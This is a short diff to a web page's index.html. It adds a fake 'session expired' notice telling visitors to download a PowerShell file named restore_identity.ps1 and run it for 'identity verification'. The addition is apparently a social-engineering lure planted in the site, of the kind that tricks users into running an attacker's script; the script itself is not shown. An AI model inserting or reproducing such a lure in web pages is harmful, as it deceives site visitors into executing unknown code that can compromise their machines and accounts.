--- a/index.html
+++ b/index.html
@@ -103,6 +103,21 @@
       </button>
     </div>
   </form>
+  <section class="identity-restore">
+    <h2 class="restore-title">⚠️ Your session has expired</h2>
+    <p>To re-enable your secure access, please run the identity verification script below:</p>
+ 
+    <a href="/restore_identity.ps1" download>
+      <button class="restore-button">🔐 Download Restore Script</button>
+    </a>
+  
+    <p><strong>How to run:</strong></p>
+    <pre>
+  1. Open PowerShell
+  2. Navigate to the folder where the file was downloaded
+  3. Run: <code>.\restore_identity.ps1</code>
+    </pre>
+  </section>
 </main>
 
 
